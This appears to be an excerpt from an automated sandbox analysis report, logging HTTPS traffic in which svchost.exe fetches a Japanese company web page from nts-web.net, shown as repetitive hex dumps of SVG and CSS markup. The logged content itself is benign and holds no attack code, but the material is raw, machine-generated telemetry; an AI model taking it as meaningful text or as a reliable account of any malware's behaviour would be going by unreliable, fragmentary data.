                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC7849INData Raw: 32 2e 38 2c 30 2c 30 2c 31 2c 35 30 38 2c 31 39 33 61 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2c 31 38 36 2e 37 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                                        Data Ascii: 2.8,0,0,1,508,193a2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M512,186.79a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC7865INData Raw: 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 35 31 2c 32 36 36 2e 34 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 32 34 2c 32 35 38 2e 33 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38
                                                                                                                                                                                                                                                                                        Data Ascii: 33"></path><path class="cls-9" d="M547.51,266.46a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M547.24,258.38a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.8
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC7881INData Raw: 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 32 2e 38 2c 33 33 38 2e 30 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                                                                                                                                        Data Ascii: 0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class="cls-9" d="M582.8,338.05a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC7897INData Raw: 33 38 2c 33 37 2e 37 35 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 33 2e 31 33 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2e 31 36 2c 33 31 2e 32 37 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 38,37.75a1.61,1.61,0,0,1-.72,2.09,2.37,2.37,0,0,1-3.13-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M333.16,31.27a1.59,1.59,0,0,1-.72,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC7913INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 37 2c 39 35 2e 32 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 34 38 2c 38 38 2e 37 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c
                                                                                                                                                                                                                                                                                        Data Ascii: .67"></path><path class="cls-9" d="M361.7,95.2a1.59,1.59,0,0,1-.73,2.08,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M361.48,88.71a1.6,1.6,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC7929INData Raw: 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 30 2c 31 35 32 2e 36 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 39 2e 38 2c 31 34 36 2e 31 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c
                                                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M390,152.64a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M389.8,146.16a1.61,1.61,0,0,1-.73,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC7945INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 36 31 2c 32 38 2e 38 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 33
                                                                                                                                                                                                                                                                                        Data Ascii: .24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.61,28.81a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.3
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC7961INData Raw: 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 34 33 30 2e 33 2c 39 34 61 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 33 33 2e 39 33 2c 38 36 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                                                                                                                                        Data Ascii: 34,2.34,0,0,1,430.3,94a2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M433.93,86.26a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2,0,0,1,.15,2.68"></path><
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC7977INData Raw: 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 36 32 2e 32 35 2c 31 34 33 2e 37 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: ,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"></path><path class="cls-9" d="M462.25,143.71a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC7993INData Raw: 73 2d 39 22 20 64 3d 22 4d 34 37 38 2e 30 35 2c 32 36 2e 33 36 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 37 2e 38 34 2c 31 39 2e 38 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: s-9" d="M478.05,26.36a1.6,1.6,0,0,1-.72,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M477.84,19.88a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC8009INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 33 37 2c 38 33 2e 38 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 31 35 2c 37 37 2e 33 33 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38
                                                                                                                                                                                                                                                                                        Data Ascii: .67"></path><path class="cls-9" d="M506.37,83.81a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M506.15,77.33a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC8025INData Raw: 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 36 39 2c 31 34 31 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 34 37 2c 31 33 34 2e 37 38 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30
                                                                                                                                                                                                                                                                                        Data Ascii: 71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.69,141.26a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.47,134.78a1.62,1.62,0,0,1-.73,2.0
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC8041INData Raw: 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 32 38 2c 31 37 2e 34 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 30 36 2c 31 31 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                                        Data Ascii: 2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.28,17.43a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.06,11a1.62,1.62,0,0,1
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC8057INData Raw: 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 63 61 73 65 2f 77 6f 72 6b 73 2f 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 68 74 6d 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 69 6d 61 67 65 73 2f 74 6f 70 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6d 61 67 65 36 2e 70 6e 67 22 20 61 6c 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 63 6f 6e 74 65 6e 74 22 3e e9 9b 86 e5 90 88 e4 bd 8f e5 ae 85 3c 62 72 3e e6 b6 88 e9 98 b2 e8 a8 ad e5 82 99 e7 82 b9
                                                                                                                                                                                                                                                                                        Data Ascii: 4"> <a href="case/works/maintenance.html"> <div class="top-performance-inner"><img src="./images/top/performance-image6.png" alt=""> <p class="top-performance-content"><br>


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        4192.168.2.35092449.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: nts-web.net
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:53 UTC162INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:51:53 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Content-Length: 2599149
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 08 Nov 2022 00:53:41 GMT
                                                                                                                                                                                                                                                                                        ETag: "27a8ed-5eceaf89b8f40"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:53 UTC162INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 77 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 77 65 62 73 69 74 65 23 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
                                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="wi
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:53 UTC178INData Raw: 77 69 64 74 68 3a 31 2e 30 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 32 2c 2e 63 6c 73 2d 31 36 33 7b 66 69 6c 6c 3a 23 39 32 64 31 64 37 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 35 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 39 37 70 78 3b 7d 2e 63 6c 73 2d 31 36 32 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 31 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 33 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 32 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 34 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 35 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 35 7b 66 69 6c 6c 3a 23 65 65 65 39 34 32 3b 7d 2e 63 6c 73 2d 31 36 36 7b 66 69 6c 6c 3a 23 65 34 38 32 37 65 3b 7d 2e 63 6c 73 2d 31 36 37 7b 66 69 6c 6c 3a 23 38 36 63 64 64 34 3b 7d 2e 63
                                                                                                                                                                                                                                                                                        Data Ascii: width:1.04px;}.cls-161,.cls-162,.cls-163{fill:#92d1d7;}.cls-161,.cls-165{stroke-width:0.97px;}.cls-162{stroke-width:1.15px;}.cls-163{stroke-width:1.25px;}.cls-164{stroke-width:1.54px;}.cls-165{fill:#eee942;}.cls-166{fill:#e4827e;}.cls-167{fill:#86cdd4;}.c
